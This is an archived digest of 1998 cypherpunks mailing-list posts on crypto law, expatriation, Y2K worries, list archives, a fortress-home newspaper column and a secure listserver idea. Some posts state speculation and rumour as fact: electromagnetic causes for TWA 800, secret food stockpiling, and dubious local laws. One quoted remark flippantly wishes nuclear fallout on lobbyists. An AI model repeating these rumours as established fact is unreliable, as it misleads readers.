> "The tree of liberty must be watered periodically with the blood of
> tyrants...."
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Licensed Ontologist              | black markets, collapse of governments.
> 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 8 Sep 1998 02:58:55 +0800
To: cypherpunks@cyberpass.net
Subject: Tesla's Secrets
Message-ID: <199809071857.OAA27475@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



DoD's latest standard for protection against electromagnetic
effects, MIL-STD-464, "Electromagnetic Environmental Effects
-- Requirements for Systems," provides a bare 17 pages of dry
prescriptions for the official standard, then 90 astonishing pages 
of ways the standard is to be applied in addressing unexpected
EM misfortunes, like ordance spontaneously exploding, planes
crashing, ships out of control, radar meltdown, personnel fried, 
and so on.

   http://jya.com/mil-std-464.htm  (346K plus images)

What comes out of this critical "anecdotal" material, not yet 
subject to precise standardization, is what Tesla learned early 
this century: the dreadful power of accumulated, boosted EM 
caused by unexpected interaction of human electronic inventions 
and natural EM forces. Such as some speculate brought down 
TWA 800.

What also comes out is that each unit of every major weapons 
system, theirs and ours (and civilian devices) can be identified 
by its unique EM  "fingerprint" -- nuclear sub, B1B, F117, AF One, 
your family Sports-ute, your chattering computer, cellphone and 
pager. As if anyone except the NSA can siphon and sort through 
them all, the compromising emanations are Out There awaiting
receivers of secret messages unintentionally sent.

A loud and clear message is that electronification of culture is
causing a build-up of powerful latent lightning looking for a ground
to blast, a sub to sink, a bomber to shatter. Be prepared for a 
technological attack, to be blamed on terrorists, but really caused 
by the expected EM effects Tesla warned about.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Tue, 8 Sep 1998 05:57:24 +0800
To: Ryan Lackey <rdl@MIT.EDU>
Subject: Re: Cypherpunks HyperArchive
In-Reply-To: <tw790jw2am5.fsf@denmark-vesey.MIT.EDU>
Message-ID: <Pine.GSO.3.95.980907145305.17348E-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



I have ~100 MB from 4/97 to present archived in mbox form. I can FTP it or
make it available to anyone who might need it to restore the archive.

-Declan


On 7 Sep 1998, Ryan Lackey wrote:

> > There is another archive at http://sof.mit.edu/cypherpunks, ironically
> > the machine that hosts it is not up at the moment
> 
> The machine suffered either disk controller or HDD problems as I was
> logged into it.  It is located in Boston, MA.  I do not currently have
> a way of getting to the machine to repair it, and this will likely
> continue to be true, so until I can get one of the people I know at
> the site where the machine is located to fix it, the archives will be
> offline.  If the machine cannot be fixed, I will put the archive up
> elsewhere.  I believe hugh@toad.com copied the entire archive at some
> point, so that might be helpful.
> 
> Sorry about this -- replicated servers are always a good idea.
> -- 
> Ryan Lackey
> rdl@mit.edu
> http://sof.mit.edu/rdl/		
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Tue, 8 Sep 1998 05:57:50 +0800
To: John Young <jya@pipeline.com>
Subject: Re: What we are Fighting
In-Reply-To: <199809071546.LAA21825@camel7.mindspring.com>
Message-ID: <Pine.GSO.3.95.980907145410.17348F-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



If anyone does it with an eye to civil disobedience, let me know. But the
bill isn't law yet, and one might reasonably hope that it won't be.

The details vary. First it was crypto in the commission of a felony. Now
it's been narrowed considerably, though not all bills have the "better"
version.

-Declan

On Mon, 7 Sep 1998, John Young wrote:

> It would be fitting for this list to be distinguished as
> the place where crypto-in-a-crime was first committed.
> 
> What might that be? A match of the crime committed
> to prevent widespread strong crypto?
> 
> Crypto-criminal anonymity in the national interest (governmental
> secrecy) fighting to prevent crypto-criminal anonymity in the 
> public interest (private secrecy).
> 
> This is not a troll, but query on what could be done to to tip the 
> hand and identify those unnamed who are most fearful of strong 
> cryptography, not their public rougers in the 3 divs of gov.
> 
> 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Tue, 8 Sep 1998 05:59:32 +0800
To: Tim May <tcmay@got.net>
Subject: Re: What we are Fighting
In-Reply-To: <v0313030bb219b85ab18e@[209.66.100.36]>
Message-ID: <Pine.GSO.3.95.980907145527.17348G-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain





On Mon, 7 Sep 1998, Tim May wrote:
> 
> However, "crypto in a crime" has not become law yet. And if we can keep
> those pesky "civil rights" lobbyists in D.C. neutralized, maybe it never
> will be. With any luck, these curriers of favor are inside the fallout
> pattern from Bin Laden's nuke.

Taking no position on "public interest" groups for this post, I'd still
note that such lobbyists don't really drive legislation in this area. It's
business groups, especially the Americans For Computer Privacy alliance,
that are drafting the bills and twisting the arms.

And their E-PRIVACY bill has crypto-in-a-crime in it.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jaggedrock@aol.com
Date: Tue, 8 Sep 1998 08:02:39 +0800
To: fedcom@qth.net
Subject: [MilCom] MRE's, KCMO, VA Hospitals
Message-ID: <1e5a5e2b.35f42dd5@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



Fellow radio enthusiasts of all the above nets,

In the past week I have learned of MRE stackpiling in a natural limestone cave
in the Kansas City Missouri area.  A 4 month government (don't know the
specific agency) contract it would appear, that will result in excess of
35,000,000 MRE's having been stored in the cave.  That's enough to feed
500,000 for 22 days roughly.  Further, I have learned that, apparently, 23 VA
hospitals that are closed (don't know where and don't know the names) are
being converted into food storage facilities with all of the equipment having
been removed and a special coating being applied to the interior surfaces to
enhance storage life.  Having said that, any fecom, milcom activity that would
shed light on this activity?  Any KCMO monitors hearing anything?  Anyone in
KCMO area that would like to try to find out more and advise the rest of us
accordingly?  

Thanks, jaggedrock@aol.com (Sangean ATS803A, Uniden 100XLT, Uniden Bearcat
895XLT Trunktracker, 48 foot roof mount dipole, roof mount Scantenna 25 feet
aloft, all low loss cable feeds - plus good human eyes and ears).  

---
Submissions milcom@qth.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <ryan@arianrhod.systemics.ai>
Date: Tue, 8 Sep 1998 03:30:48 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Cypherpunks HyperArchive
In-Reply-To: <v0313030ab219b7376d3b@[209.66.100.36]>
Message-ID: <E0zG6wN-00071Z-00@arianrhod.systemics.ai>
MIME-Version: 1.0
Content-Type: text/plain



> Indeed, weren't you developing some kind of distributed eternity server? So
> much for eternity, I guess.

I believe Eternity depends upon a viable electronic cash system.  I put 
Eternity DDS on hold until one existed, and switched to working on HINDE,
a project with Ian Goldberg, to create a workable electronic cash system.
Creating a workable electronic cash system became...complicated (e.g. given
that I was recently at Bob Hettinga's electronic cash conference in Boston
giving a technical presentation, and it turns out the new CEO of DigiCash
was i the audience as "an interested investor"...perhaps it was impolitic
of me to continually bash DigiCash and David Chaum in a group of people
who I did not all definitely know to not be DigiCash employees...)  

Ian's gone on to do
Zero-Knowledge Systems, and I'm now working on what follows in this
email, so HINDE, the defined as the cypherpunkish protest against DigiCash, 
is probably quiescent.  Don't read anything into that, though.

For backing up the Cypherpunks Archives, I could have done just as well
by setting up two identical machines with rsync mirroring the drives.  I do
this kind of thing with real data, but didn't feel the 1gb of archive data
was high enough importance to mirror.  It appears the machine will be up
in a week or so, and if the drive is broken, I will send it off to a drive
recovery place for recovery, so the archives will be up, minus the most
recent month or two, in a month, at the outside.
> 
> Ryan, could you tell us what you are working on, and what has taken you out
> of the country?
The two answers are related, but distinct.

I am working on an interesting project with an interesting organization to
develop interesting applications for interesting clients.  I would provide
more detail here now if I could, and will in the future.

I have left the US for many reasons.  One, because I can, at least now.  I left
about a month ago.  I'm increasingly concerned about y2k issues, and my
situation in Boston (living about 0.25 miles from the exact center of Boston)
was not at all compatible with the kind of preparation I believe in.  I am
concerned not so much with the primary/prompt effects of y2k as I am
of societal panic and the government's response, perhaps proactive, to
that panic.

I left because the crypto policies of the US were getting increasingly
obnoxious, although I am a US citizen, and am not violating any EAR
restrictions.  (I'm actually probably obeying US law even more totally
here than I did when I lived in the US -- in Cambridge, MA, it is a 
crime to "interdigitate", that is, to hold hands with someone of the opposite
sex.  I think I was actually a potential felon before I left too, as I had an 
unpaid library fine at the Boston Public Library which I paid the day before
I left, and I believe having outstanding fines for greater than a year is
a felony in MA, a holdover from colonial times.)

I left because I wanted to be doing more, and plotting/scheming about what
I could be doing if I were not in the US less.  

I left because the US is just not the best place for me to live at the
current time, given that my primary goal right now is to accomplish the
"interesting projects".  

I left because in a time of uncertainty about the future, it is nice to
be far away from both soft targets and fundamentally self-serving
organizations with large amounts of power and no constraints upon
their use of such.

Given that I haven't actually broken any laws in coming here, and am being
scrupulous to avoid breaking any while I'm here, it wasn't really that
big a change.  I sold my stereo and long-term-loaned my larger computers
and monitors to one of my former housemates, but if things didn't work out, 
I could very easily move back to the US.  However, I can't imagine any
situations where this is a worthwhile choice.  I was thinking about the
things in the US I could conceivably miss -- some heavy industrial things,
the Grand Canyon, and MAE-East, and all of them can be substituted
with other things elsewhere.

So, leaving was somewhat supported by what I'm working on, but neither
really required the other -- they were independent choices which made
sense independently and made even more sense together.

I'd encourage anyone interested in leaving the US for a few years to 
seriously consider doing so ASAP, before 1 January 1999 if at all possible.
It takes some time to get set up in a new place, and you want this all
sorted out before any potential uncertainty becomes reality.

If I had the money and time to set myself up in the US with a reasonable
plot of land far away from any nearby targets or attackers, I would have
considered it more than I did, but I don't yet have investment income to
live from, so I needed a place where I could make a reasonable amount of
money, and Montana wasn't quite it.  For those who can, or who were lucky
enough to find themselves in that position before the y2k uncertainty
became a pressing issue, staying in place may easily make more sense.

Anguilla is actually a pretty reasonable choice as far as a place to
spend a few years away from the US -- 7 000 people, many with a strong
libertarian bent because they've always owned their own land, reasonable
comms, no taxes, accessible through a neighboring island's jet airport
but not really a place with a lot of through-traffic itself, etc.  If you
stockpile a bit of food and supplies, you're probably all set -- security
is nowhere near as big an issue here as it would be in most of the US.  I
was objectively evaluating my situation in Boston, and it would have required
more than a reinforced brigade to provide any reasonable security there.  The
cost of that buys an awful lot of canned/nitrogen-packed food...  I'm sure
there are other places in the world which are reasonable, but I've
only really looked at Anguilla, due to fc99, and I knew people here already.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Tue, 8 Sep 1998 06:33:10 +0800
To: <e$@vmeng.com>, <cypherpunks@cyberpass.net>
Subject: RE: crypto-expatriatism
In-Reply-To: <v0401170db219f0b9c52c@[139.167.130.246]>
Message-ID: <000501bddaaf$fd1844c0$5f8195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain



Bob Hettinga wrote:

: Anyway, as the old "excrable" e$yllogism goes,
:
: Digital commerce is financial cryptography.
: Financial cryptography is strong cryptography.
: Therefore, if there's no strong cryptography, there's no
: digital commerce.
................................................................


It could justify becoming an exile, to develop the strong crypto needed for digital
commerce.
The conditions are right for it.

    ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 8 Sep 1998 04:01:35 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Cypherpunks HyperArchive
In-Reply-To: <tw790jw2am5.fsf@denmark-vesey.MIT.EDU>
Message-ID: <v04011706b219d6a9a45d@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:17 PM -0400 on 9/7/98, Tim May trolled:

> Ryan, could you tell us what you are working on, and what has taken you out
> of the country?

If I told you, I would have to kill you?

Seriously, Ryan and Ian were both moderators the Philodox Symposium on
Digital Bearer Transaction Settlement, held this July at the Harvard Club
in Boston. During the Symposium, they had several dinner conversations with
a couple of Symposium participants from a company which will remain
nameless, and they're currently putting together a digital bearer
transaction settlement system for those folks. Somewhere. :-).

Also there at the Symposium was Scott Loftesness, who's now the new
president of DigiCash, though the rest of us didn't know that at the time.
I was hoping someone from DigiCash would show up. I just didn't know
exactly how successful I was going to be in that until about two weeks ago.

Of course, a good time was had by all, including the likes of Dan Geer,
John Muller, some fairly serious financial people from Citicorp and VISA
and EGold, and several other interesting folks from various walks of
crypto, finance, and law. Had a great time, wish you were there, and all
that.

Yup, that financial technology evangelism stuff's just a waste of time.
Never gonna amount to much.

:-).

For my next trick  (besides some road-show DBTS seminars I'd like to do,
some speeches at upcoming electronic commerce/trading conferences in places
like Boston and London, the DBTS series I'm doing for Duncan Goldie-Scott's
online edition of the Financial Times, a white paper I'm doing for a credit
card company, some other fee-and-referral-commission consulting contracts,
and a few threatend projects from book editors <whew!>:-)) is a
chinese-wall, peer-reviewed legal conference on digital bearer settlement,
hopefully next summer. I'm recruiting the program chair now, and have
several people you've probably heard of in mind for the program committee,
though ultimately that's the committee chairman's decision.

Having some fun, *now*, as those SNL wild and crazy guys used to say...

Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 8 Sep 1998 04:01:38 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ISPI Clips 4.21:New Up-Scale Home Designs Reflect PrivacyConcerns
Message-ID: <v04011708b219e8e4edb6@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
From: "ama-gi ISPI" <offshore@email.msn.com>
To: <Undisclosed.Recipients@majordomo.pobox.com>
Subject: IP: ISPI Clips 4.21:New Up-Scale Home Designs Reflect Privacy Concerns
Date: Mon, 7 Sep 1998 00:35:26 -0700
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: "ama-gi ISPI" <offshore@email.msn.com>

ISPI Clips 4.21: New Up-Scale Home Designs Reflect Privacy Concerns
News & Info from the Institute for the Study of Privacy Issues (ISPI)
Monday September 7, 1998
ISPI4Privacy@ama-gi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This From: The Washington Post, Saturday, September 5, 1998; Page E03
http://www.washingtonpost.com

The Neo-Fortress Home: Can the Concept Be Defended?
http://www.washingtonpost.com/wp-srv/WPlate/1998-09/05/070l-090598-idx.html


By
Roger K. Lewis


"A House for the New Millennium" was the headline on a recent Wall Street
Journal article about residential design trends. It should have read, "A
House for the New Millionaires," or perhaps, "A House for Fearful
Millionaires."

With a full-color, bird's-eye view illustration and a tabulation of what's
in and what's out, writer June Fletcher predicts that homes of the future
will "look more like medieval fortresses than futuristic bubbles." Picture
what Fletcher calls the Neo-Fortress Movement: towers and turrets; walled
yards; locked gates; and tall, narrow windows.

And most of the examples she cites have fortress-like price tags. At the
low end were subdivision houses in Arizona ranging from $382,000 to
$639,000. More typical were $950,000 homes in California; $1 million homes
in Kentucky and Pennsylvania; a 10,000-square-foot, $3.3 million spec home
in New Jersey; and a 14,000-square-foot, $8 million home in Florida.

"The neo-fortress style reflects end-of-the-century anxieties about privacy
and security," according to the article, along with diminishing home owner
interest in the "showy houses of the '80s, with their soaring ceilings,
open floor plans and huge windows that invite passersby to peer in and
check out the furniture."

On the article's "out" list: Palladian windows, Greek columns, grand
entries, two-story plans, big lawns, common areas, great rooms and computer
nooks in kitchens. On the "in" list: motor courts, walled courtyards,
single-story plans, numerous defined rooms, 10-foot ceilings, two home
offices and turrets.

Turrets, California architect Barry Berkus told the Journal, "connote
fortification and strength." Indeed, Berkus suggests that people are
attracted to turrets because they evoke lonely, romantic symbols such as
lighthouses and silos.

By the time I reached the end of the article, I was wondering what the
average American homeowner or home buyer might make of all this, not to
mention architects and builders who create houses that buck or ignore this
fortification trend. In 2001, would those of us whose homes sport large
windows, vaulted ceilings and lack medievally inspired towers feel
vulnerable and defenseless as well as out of fashion?

There is nothing intrinsically wrong, either aesthetically or functionally,
with most of the trendy features mentioned in the article. Walled-in
courtyards, towers and narrow windows have been around for thousands of
years. Constructing homes with discrete, functionally differentiated rooms
is an established tradition. In most cultures, visually separating spaces
for private, domestic use from public spaces is a standard and desirable
practice.

But these design elements and strategies for shaping a house should be
employed when they fit the circumstances and context pertaining to the
house, its location and site, its occupants and its occupants' budget.

Thus the courtyard house, which evolved as the dominant residential
building type in ancient Mediterranean, African, southern European and
Asian cultures, is well suited for mild climates where inhabitants can
spend much of the year outdoors in the courtyard, and where they don't have
to cope with snow and ice -- places such as Florida, Texas, New Mexico,
Arizona and California.

But courtyard houses usually make little sense in New England, upstate New
York, Appalachia, the upper Midwest or the foothills of the Rockies.

One-level courtyard homes fit poorly on sites that aren't reasonably flat
or on tight, awkwardly shaped lots. Given their introverted nature, they
are rarely the logical choice for lots with dramatic views.

Generally, the one-level courtyard house configuration is among the more
expensive ways to build a home. It is much less compact than other building
types, especially the two- or three-story, cubicly shaped house with
basement and attic. It entails more roof area and perimeter wall surface to
enclose a given amount of interior space, resulting in not only increased
construction costs but also increased heating, cooling and maintenance
costs.

Some could read the Wall Street Journal article and mistakenly infer that
the neo-fortress style may be perfectly okay for anyone, anywhere. Clearly
it is not.

But there's something more disturbing than the potential for readers to
draw incorrect inferences about architectural styling. The report implies
that Americans' perceptions, attitudes and behavior are increasingly shaped
by security concerns. Segregation and isolation, not integration and
connection, seem to preoccupy more and more citizens who want to live not
only in gated communities, but also in gated homes.

Referring to the $8 million home in Florida with a pair of turrets,
Fletcher reports that the turret near the garage houses a platform accessed
by a circular stair and a fireman's pole. "The client," noted the builder,
"thought it would be great for his grandchildren to be able to shoot their
BB guns out the window, then slide down the pole."

Before arriving at this Florida bastion, perhaps visitors should know more
about the prospective BB gun targets as well as the rest of the home
arsenal -- what about crossbows and boiling oil?

The $1 million builder's house in Kentucky encompasses 10,000 square feet
and has a three-story, outdoor media room, according to Fletcher, including
a shower, hot tub, fireplace, gazebo with built-in television and
kitchenette, bar, small pool and waterfall. The owners boast that, when
fireworks are flying in distant Cincinnati, they can sit in their outdoor
media room and watch the fireworks live and on television at the same time,
experiencing the real and the virtual simultaneously.

Could this be the ultimate suburban house, a house connected only
electronically to the rest of the world, a house you never would have to
leave?

Courtyard homes can be wonderful in their place, their virtues being
spatial amenity, not defendability. They should be built not to escape the
communal world outside, but rather to heighten enjoyment of the familial
world inside.

As for turrets, man's home may be his castle, but it doesn't have to look
like one.

(c) Copyright 1998 The Washington Post Company


--------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material is
distributed free without profit or payment for non-profit research
and educational purposes only.
---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
of Privacy Issues" (ISPI). To receive "ISPI Clips" on a daily bases
(approx. 4 - 8 clips per day) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other and to likewise
inform them about techniques to enhance their privacy.

But, none of this can be accomplished without your kind and
generous financial support. If you value in the ISPI Clips service or if
you are concerned about the erosion of your privacy in general, won't
you please help us continue this important work by becoming an "ISPI
Clips Supporter" or by taking out an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Clips Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.


















































**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Tue, 8 Sep 1998 08:03:31 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: cryptographically secure mailing list software
Message-ID: <33CCFE438B9DD01192E800A024C84A19284612@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




I've been curious as to whether anyone has developed and/or whether it
is technically feasible to develop a cryptographically secure
listserver.

e.g. 

User would submit their PGP public key to the listserver upon
subscription, submitted messages would be encrypted with the
listserver's public key, the listserver would decrypt the message and
re-encrypt it with the key of all members and distribute it. This way
the users don't need to manage all the keys or even know the list
membership. Most listservers already have the ability to moderate
subscription messages, the list would not be snoopable.

What sort of overhead would exist on a list of a few hundred members?

If there is not something existing that will do this, what is the best
mailing list codebase to start from? Majodomo I imagine might not be up
to the task being written in Perl, LSoft ListSERV I love but it is
commercial (no sourcecode).

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 8 Sep 1998 05:46:45 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Government Regulation & Scienctific Research (fwd)
Message-ID: <199809072204.RAA05499@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 8 Sep 1998 02:52:06 -0700 (PDT)
> From: Alan Olsen <alan@clueserver.org>
> Subject: Re: Government Regulation & Scienctific Research

> I expect the first world to start to take after the East German model.

You mean the one that failed after only 40 years?...

> -- Those who are precieved as being a possible threat will be
> marginalized, jailed, forced to flee, or co-opted.
> 
> -- A large portion of the population will be devoted towards control of
> the population.  (Either in law enforcement, paid snitches, propaganda, or
> similar activities.)

There is a problem with these two conclusions. In short, the impact on
American business would be devastating. It won't happen to this degree for
the simple reason that there wouldn't be anyone to actualy pay for it and
the American citizen is a LOT less likely to stand their post after 3 months
of not getting paid then a Stasi proll ever did.

If you think about it a moment there are really only TWO issues driving this
entire situation in this country:

-  increased technology and its run-away consequences are completely
   beyond the keen of politico's because they can't spend the number of
   hours per day playing with it to understand it AND still run a
   campaign. They feeled threatened and as a consequence their national
   model (in their heads) is threatened. Politicians hate to hear:
   "Oh, I don't need any help. Thanks." With the ease that technology
   jumps ANY boundary it's a futile task they've handed themselves.

-  the drug war. With the movement currently gaining strength in this
   country for medical marijuana and the knock-down-drag-out that's
   coming between the states and the feds over it, the cost will be
   prohibitive. We are currently at something like 1/150 people in this
   country in jail, the majority for minor drug offences. The impact
   of this (this is 1 person in jail out of every 2 blocks of homes)
   on the citizen-government relationship is souring fast. When the
   police in San Francisco say on national news they won't prosecute
   pot houses because they "have more important things to deal with like
   murder and burglary" something big is coming...

   And it ain't a bunch of nazi stormtroopers on every corner.

> -- Much of the Government's budget will be devoted to citizen control.

No it won't, it will be dedicated to spin-control and legerdemain.
Government toadies like their air conditioned desks entirely too much.

> In 50 years I expect that the creative citizenry will either be
> underground, fled, or no longer participating in the active discorse of
> the society.  All of the life will be sucked out of the population in
> order to fight the "Scapegoats of the Week/Month/Year/Century". 

I doubt it. What's going to happen is that the reach of government is going
to weaken because it's going to become harder (not easier) to track
individuals. Why do you think these folks are so hot and heavy on this now?
They know something is coming that will make their world-view irrelevant and
it scares the hell out of them.

History shows that any country that does what you describe lasts no more
than a couple of generations (the 20 yr. kind). Even if you go back to the
Romans you will find that there is a definite pattern to the way the laws
swing from restrictive to permissive.

> It will only fall apart when we reach a level where no one wants to live
> here any more and it falls apart from internal system failure and
> hemoraging.

It will fall apart because much of the discussion will become irrelevant.

It's interesting that doom-sayers like yourself never mention that the
number of opposition camps to the fed's is growing, not lessening. They are
finding it harder, not easier, to figure out what people are doing and why.
The one negative aspect to this movement is that it tends to attrack very
indipendant individuals who don't know how to cooperate, cooperation is the
only advantage the feds have on their side.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 8 Sep 1998 05:50:42 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: e$: crypto-expatriatism (fwd)
Message-ID: <199809072208.RAA05578@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 7 Sep 1998 17:29:12 -0400
> From: Robert Hettinga <rah@shipwright.com>
> Subject: e$: crypto-expatriatism

> Ridgeway told Eisenhower at the outset that Vietnam was a multi-million-man
> war, and Eisenhower stayed out accordingly, throwing a few marginal people on
> the ground to shut Lodge up. It took Testosterone Jack to get a Special-Forces
> hard-on. Eventually he and Desktop Lyndon ended up screwing a pooch
> instead of the commies.

Balonely, do your research somewhere beside a bar. JFK had no intention of
sending more troops in and every intention of withdrawing the troops that
were there. There are two sources you can look at to verify this. The first
is the troop count over time and the internal presidential memos to the
Chiefs of Staff. Had JFK not been shot there would have been NO US troops in
Vietnam by the end of '64.

LBJ is the nit-wit who crewed the proverbial pooch.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 8 Sep 1998 05:34:41 +0800
To: e$@vmeng.com, cypherpunks@cyberpass.net
Subject: e$: crypto-expatriatism
In-Reply-To: <v0313030ab219b7376d3b@[209.66.100.36]>
Message-ID: <v0401170db219f0b9c52c@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


At 3:38 PM -0400 on 9/7/98, Robert Hettinga wrote about Ryan Lackey's
whereabouts, on cypherpunks:

> If I told you, I would have to kill you?

Whew. Glad Ryan has now said something publically now about his and Ian's bit
of extraterritorial subtrifuge (though Ian  doesn't qualify, of course). I
mean, I just *hate* keeping secrets... ;-).

Frankly, I *really* have a hard time with all this
man-without-a-first-world-country, crypto-expat stuff. I think making the
technology not eonomically optional is the way to change things, and no
amount of romantic, jurisdiction-shopping "regulatory arbitrage" is going
to alter reality all that much.

But, I guess, Anguilla's as nice a place to have this affliction as any I can
think of.

And, I wish Vince -- and now, apparently, Ryan -- good luck, whatever happens.


Yet, for some reason, memories of Vietnam-era draft-dodgers keep coming to
mind. For what it cost them all personally, not much good came of it, I'd say,
for them or anyone else. The people who protested the war and "fought the good
fight" to end it stayed here to do it, after all. The most potent anti-war
activists were Vietnam vets themselves, for that matter. And, of course,
Ridgeway told Eisenhower at the outset that Vietnam was a multi-million-man
war, and Eisenhower stayed out accordingly, throwing a few marginal people on
the ground to shut Lodge up. It took Testosterone Jack to get a Special-Forces
hard-on. Eventually he and Desktop Lyndon ended up screwing a pooch
instead of the commies.


Do people out there really think somebody like Gore's going to do a
crypto-amnesty someday? I didn't think so. Ashcroft, maybe, but don't hold
your breath, there, either. It'll be decades, I bet, and our "boys over
there" will have grey hair long before they do come back home on this one.
Political inertia is probably going to keep a few people we know outside
the fence, looking in, for an awful long time after the issue's utterly
dead.

I expect people who do this crypto-expat stuff are going to get their
new passports refused at the U.S. border when they visit, and I think that
things are going to get worse for them for a long time before they get better.
Of course, there's a fair argument to be made that if they do get refused,
it's probably time to leave, anyway, but I'll let someone else gnaw that bone.

And, frankly, I *do* expect that the FBI will attempt domestic crypto
controls, just like they've been been trying to do for some time now. But,
unlike a lot of people, I think that the marketplace will steamroller all
such silliness into yet another roadtop attraction, before or after its
legislation.

Anyway, as the old "excrable" e$yllogism goes,

Digital commerce is financial cryptography.
Financial cryptography is strong cryptography.
Therefore, if there's no strong cryptography, there's no digital commerce.


So, call me an optimist.

Like I've said before, I've heard the end of life and liberty as we know it
predicted over and over again -- hell, I've even believed so myself, once or
twice -- but, like the Gibbon quote in my .sig goes, "however it may deserve
respect for its usefulness and antiquity", I ain't seen it happen yet.

Cheers,
Bob Hettinga


